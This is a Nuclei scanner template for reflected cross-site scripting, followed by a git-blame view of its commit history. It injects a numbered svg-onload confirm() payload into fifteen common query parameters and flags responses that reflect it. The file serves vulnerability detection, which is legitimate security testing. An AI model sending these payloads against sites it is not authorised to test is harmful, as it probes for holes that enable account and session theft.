nuclei-templates/vulnerabilities/generic/top-xss-params.yaml

id: top-xss-params

info:
  name: Top 15 XSS Check
  author: foulenzer & geeknik
  severity: medium
  description: Searches for reflected XSS in the server response via GET-requests.
  tags: xss
  parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"

    redirects: true
    max-redirects: 1
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "\"<svg/onload=confirm('testing-xss"
        part: body

      - type: word
        words:
          - "text/html"
        part: header

      - type: status
        status:
          - 200
moving more files around 2021-01-09 13:02:04 +00:00			`id: top-xss-params`
updating templates 2020-08-15 08:48:23 +00:00
			`info:`
			`name: Top 15 XSS Check`
Update top-15-xss.yaml Fine tuning the template. Sometimes a host will redirect the original request to another page or subdomain and the XSS happens on that page instead of with the original request. I believe a max-redirects of 1 should be sufficient. 2020-11-03 18:00:38 +00:00			`author: foulenzer & geeknik`
updating templates 2020-08-15 08:48:23 +00:00			`severity: medium`
			`description: Searches for reflected XSS in the server response via GET-requests.`
Adding tags to vulnerabilities and workflows 2021-02-12 05:53:01 +00:00			`tags: xss`
tags improvements 2021-04-06 08:15:46 +00:00			`parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p`
updating templates 2020-08-15 08:48:23 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update top-15-xss.yaml Makes sense to number the payloads to easily show which parameter is vulnerable. 2020-11-26 16:10:09 +00:00			- "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"
tags improvements 2021-04-06 08:15:46 +00:00
Update top-15-xss.yaml Fine tuning the template. Sometimes a host will redirect the original request to another page or subdomain and the XSS happens on that page instead of with the original request. I believe a max-redirects of 1 should be sufficient. 2020-11-03 18:00:38 +00:00			`redirects: true`
			`max-redirects: 1`
Update top-15-xss.yaml spaces again. 2020-09-04 07:49:39 +00:00			`matchers-condition: and`
updating templates 2020-08-15 08:48:23 +00:00			`matchers:`
			`- type: word`
			`words:`
Update top-xss-params.yaml 2021-05-06 12:55:40 +00:00			`- "\"<svg/onload=confirm('testing-xss"`
Update top-15-xss.yaml 2020-09-04 07:46:30 +00:00			`part: body`
Update top-15-xss.yaml 2020-11-26 17:59:40 +00:00
Update top-15-xss.yaml 2020-09-04 07:46:30 +00:00			`- type: word`
			`words:`
matcher update 2020-12-02 04:31:03 +00:00			`- "text/html"`
Update top-15-xss.yaml Fine tuning the template. Sometimes a host will redirect the original request to another page or subdomain and the XSS happens on that page instead of with the original request. I believe a max-redirects of 1 should be sufficient. 2020-11-03 18:00:38 +00:00			`part: header`
matcher updates 2021-01-11 06:44:22 +00:00
			`- type: status`
			`status:`
Update top-xss-params.yaml 2021-05-06 12:55:40 +00:00			`- 200`